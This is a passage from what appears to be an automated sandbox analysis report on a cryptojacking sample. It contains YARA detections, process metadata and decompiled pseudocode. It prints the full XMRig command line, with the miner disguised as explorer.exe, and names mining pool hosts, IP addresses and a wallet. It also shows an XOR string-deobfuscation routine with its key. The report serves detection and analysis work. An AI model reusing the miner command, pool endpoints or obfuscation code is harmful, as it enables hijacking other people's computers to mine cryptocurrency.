                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.719362766.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.717951007.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.704736312.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.713985115.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.708825337.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.716519488.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.706517358.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.721988497.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.702282973.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.710365911.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: explorer.exe PID: 6764 Parent PID: 5252

                                                        General

                                                        Start time:18:20:18
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
                                                        Imagebase:0x7ff6fee60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.782826325.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.728904022.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.744667827.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.718963137.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.825932798.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.713121937.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.715770261.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.769937970.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.724515509.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.704591182.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.797286728.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.727173943.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.729811300.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.721557142.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.710976279.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        Chronological Activities

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >

                                                          Analysis Process: pcNCraWcRk.exe PID: 1380 Parent PID: 2848 pcNCraWcRk.exeCOMMON

                                                          Executed Functions

                                                          Function 004010C4, Relevance: 2.7, APIs: 2, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 33%
                                                          			E004010C4(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
				intOrPtr _v24;
				char _v32;
				char _v136;
				void* _v144;
				char _v152;
				char _v160;
				char _v168;
				char _v176;
				char _v696;
				void* _v1216;
				long long _v1224;
				long long _v1232;
				long long _v1256;
				long long _v1264;
				long long _v1272;
				long long _v1280;
				long long _v1288;
				long long _v1296;
				long long _v1304;
				long long _t105;

				_a8 = __rcx;
				_a16 = __rdx;
				L00402480(); // executed
				memset(??, ??, ??);
				_v136 = 0x68;
				_v144 = 0;
				_v152 = 0x21f8d4;
				_v160 = 0;
				L00402490();
				E00401000(0x403021,  &_v176);
				_v1224 = 0x403021;
				E00401000(0x403027, 0x403021);
				L00402498();
				_v1232 = 0x403021;
				E00401000(0x403032, 0x403021);
				L004024A0();
				E00401000(0x403047,  &_v696);
				sprintf(??, ??);
				_v1264 =  &_v32;
				_v1272 =  &_v136;
				_v1280 = 0;
				_v1288 = 0;
				_v1296 = 0;
				_v1304 = 0;
				_t105 =  &_v696;
				L004024A8(); // executed
				_v1296 = _t105;
				_v1304 = _t105;
				E00401D58(_v32,  &_v144,  &_v152,  &_v152); // executed
				E00401000(0x403051, _v32); // executed
				_v1304 =  &_v160;
				E00401D18(_v32, _v144, 0x403051, _v152); // executed
				_v1304 = 0;
				E00401D98(_v32,  &_v144,  &_v160, 0); // executed
				_v1256 = 0;
				_v1264 = 0;
				_v1272 = 0;
				_v1280 = 0;
				_v1288 = 0;
				_v1296 = _v144;
				_v1304 = _v144;
				E004019D8( &_v168, 0, 0, _v32); // executed
				E00401C98(_v32, 0, 0, _v32); // executed
				E00401C98(_v24, 0, 0, _v32);
				return 0;
			}























                                                          0x004010cf
                                                          0x004010d3
                                                          0x004010e2
                                                          0x00401109
                                                          0x00401113
                                                          0x00401120
                                                          0x00401131
                                                          0x00401142
                                                          0x00401156
                                                          0x00401173
                                                          0x0040118a
                                                          0x00401197
                                                          0x004011a2
                                                          0x004011b9
                                                          0x004011c6
                                                          0x004011f2
                                                          0x0040120f
                                                          0x0040123b
                                                          0x00401244
                                                          0x0040124d
                                                          0x0040125c
                                                          0x0040126b
                                                          0x00401275
                                                          0x0040127f
                                                          0x004012a8
                                                          0x004012b8
                                                          0x004012c2
                                                          0x004012cc
                                                          0x004012fa
                                                          0x00401318
                                                          0x00401324
                                                          0x0040134d
                                                          0x0040135c
                                                          0x0040138a
                                                          0x00401399
                                                          0x004013a8
                                                          0x004013b7
                                                          0x004013c6
                                                          0x004013d0
                                                          0x004013dc
                                                          0x004013e8
                                                          0x00401419
                                                          0x00401428
                                                          0x00401437
                                                          0x00401442

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: memsetsprintf
                                                          • String ID:
                                                          • API String ID: 4041149307-0
                                                          • Opcode ID: b3734fdab49db2e8e5c0d38b22238c8b140cd7145616500da49d03b5222e62e5
                                                          • Instruction ID: 078a9e90446ca29d652139c07802c4c69a01c5176e4c1145617d3bb3e72db8bb
                                                          • Opcode Fuzzy Hash: b3734fdab49db2e8e5c0d38b22238c8b140cd7145616500da49d03b5222e62e5
                                                          • Instruction Fuzzy Hash: 99712B61702B148DEB909B27DC5139A37A8B749FC8F804176EE4CA7B98EE3DCA448744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401000, Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E00401000(long long __rcx, long long __rdx, long long _a8, long long _a16) {
				long long _v16;
				signed int _v20;
				void* _v32;
				signed char* _v40;
				signed int _t30;

				_a8 = __rcx;
				_a16 = __rdx;
				L00402478(); // executed
				_v16 = _a16 + 1;
				 *((char*)(_v16 + _a16)) = 0;
				_v20 = 0;
				while(1) {
					_t30 = _v20;
					if(_t30 >= _a16) {
						break;
					}
					_v32 = _v16 + _v20;
					_v40 = _a8 + _v20;
					asm("cdq");
					 *_v32 =  *_v40 ^  *("bvv,bg@643(^+!pw[-x0h5m>,w=g+2i]" + _v20 % 0x20);
					_v20 = _v20 + 1;
				}
				return _t30;
			}








                                                          0x0040100b
                                                          0x0040100f
                                                          0x00401023
                                                          0x00401028
                                                          0x0040103e
                                                          0x00401045
                                                          0x00401048
                                                          0x00401048
                                                          0x00401050
                                                          0x00000000
                                                          0x00000000
                                                          0x00401085
                                                          0x0040108e
                                                          0x00401092
                                                          0x004010b2
                                                          0x00401063
                                                          0x00401063
                                                          0x004010bb

                                                          Strings
                                                          • bvv,bg@643(^+!pw[-x0h5m>,w=g+2i], xrefs: 00401098
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID: bvv,bg@643(^+!pw[-x0h5m>,w=g+2i]
                                                          • API String ID: 0-2925819155
                                                          • Opcode ID: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                          • Instruction ID: 0d50406a0cd25772023a57935085f3dfc6f67c384a3cfb9a17e074b16623a215
                                                          • Opcode Fuzzy Hash: 7c3953f8a7c90db685ffea7de54f2d06ba9ad392580460fe7ac0a4260f709850
                                                          • Instruction Fuzzy Hash: BC214772B01A40DEEB04CBA9D8913AC3BF1E74878DF00846AEE5DA7B58DA38D5518744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004022FA, Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			_entry_() {
				char _v12;
				long long _v24;
				long long _v40;
				void* _t15;
				void* _t16;

				L00402488();
				L004024B8();
				L004024C0();
				L004024C8();
				_v24 = __imp____argc;
				_v40 =  &_v12;
				L004024D0();
				_v24 = __imp____argc;
				_t15 = E0040224F(_t16, _v24,  *__imp____argv,  *__imp___environ,  &_v12); // executed
				L004024D8(); // executed
				return _t15;
			}








                                                          0x00402327
                                                          0x00402339
                                                          0x00402349
                                                          0x00402364
                                                          0x0040237e
                                                          0x00402386
                                                          0x004023a7
                                                          0x004023c1
                                                          0x004023e0
                                                          0x004023eb
                                                          0x004023f1

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7060d96631f312a0dc568d4d07ef498c7ad85a2d75c32ebe8d41481305ccb03
                                                          • Instruction ID: 9686121eb9f72fae5e10ab2d8a3ac4b9ff7170e1f7ab924ecbeb4b8f0178945f
                                                          • Opcode Fuzzy Hash: d7060d96631f312a0dc568d4d07ef498c7ad85a2d75c32ebe8d41481305ccb03
                                                          • Instruction Fuzzy Hash: 9F215B64702A149CEA44DB67DD653A933A5B74DFC8F808436AE0CA73A5EE7DC6508344
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040224F, Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 43%
                                                          			E0040224F(void* __ecx, long long __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				intOrPtr _v12;
				long long _v24;
				intOrPtr _t14;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				E00402158(_a16, _a16, _a24);
				_v24 = __imp____argc;
				_t14 = E004010C4(_v24, _v24,  *__imp____argv); // executed
				_v12 = _t14;
				E004021EC();
				return _v12;
			}






                                                          0x0040225a
                                                          0x0040225e
                                                          0x00402262
                                                          0x00402280
                                                          0x0040229a
                                                          0x004022b9
                                                          0x004022be
                                                          0x004022c1
                                                          0x004022ca

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: memsetsprintf
                                                          • String ID:
                                                          • API String ID: 4041149307-0
                                                          • Opcode ID: 65e9c95be4e24cea900e83d314afdb39b553b8fe9f9e6c70aa87f87638c826b2
                                                          • Instruction ID: 0ef21ab13f0e72f5e82b28ca8a1d802b698ef2cd9161ee3339a6462a6fe8d703
                                                          • Opcode Fuzzy Hash: 65e9c95be4e24cea900e83d314afdb39b553b8fe9f9e6c70aa87f87638c826b2
                                                          • Instruction Fuzzy Hash: 1501E476702B488DDB40DF67DC9139833A4B349BC8F008826AE0CA7B68DA38C6618744
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 004019D8, Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E004019D8(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E004018EF(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                                          0x004019d8
                                                          0x004019dd
                                                          0x004019e2
                                                          0x004019e7
                                                          0x004019f5
                                                          0x00401a15
                                                          0x00401a17

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                          • Instruction ID: 627af5f8094be66caef8c1b0706e96e42ef7260cfbbcc69a360fc60fbdea0424
                                                          • Opcode Fuzzy Hash: ca3c3e23f7f5060f60ee19056fbc1c70fca65fad76dbb6e40effcae9b66313bb
                                                          • Instruction Fuzzy Hash: DCE0B676608BC4818610EF56F08000EB7A4F3D87C4B50451AFEC807B19CF38C1608B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401D58, Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E00401D58(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E004018EF(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                                          0x00401d58
                                                          0x00401d5d
                                                          0x00401d62
                                                          0x00401d67
                                                          0x00401d75
                                                          0x00401d95
                                                          0x00401d97

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                          • Instruction ID: f5786d1abfcdca8d5aa6566e32f28f63e9c87e4faa2297304d8ad0afc813e31e
                                                          • Opcode Fuzzy Hash: a33d4c2589a0a0e030cf565e08a5ce4a3f4aa7e1e7ab656288357c1d05c0b8cb
                                                          • Instruction Fuzzy Hash: A9E0B6B6608B84918210EF96F08040AB7A4F7D87C4B14495AFAC807B19CF38C1608B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401C98, Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E00401C98(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
				void* _t9;
				signed long long _t11;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_t9 = E004018EF(_t11, __rcx);
				asm("syscall");
				return _t9;
			}





                                                          0x00401c98
                                                          0x00401c9d
                                                          0x00401ca2
                                                          0x00401ca7
                                                          0x00401cb5
                                                          0x00401cd5
                                                          0x00401cd7

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.670850324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.670843805.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.670876265.0000000000403000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.671255366.0000000000623000.00000004.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a28beb2cf51f9b71989e72db21d67a0b42a4e1b113aff34d5980b4674a401d7
                                                          • Instruction ID: a4dee403f1f2686bbcf15adc62412925ab874ec13bcc78934c739608fafdbb81
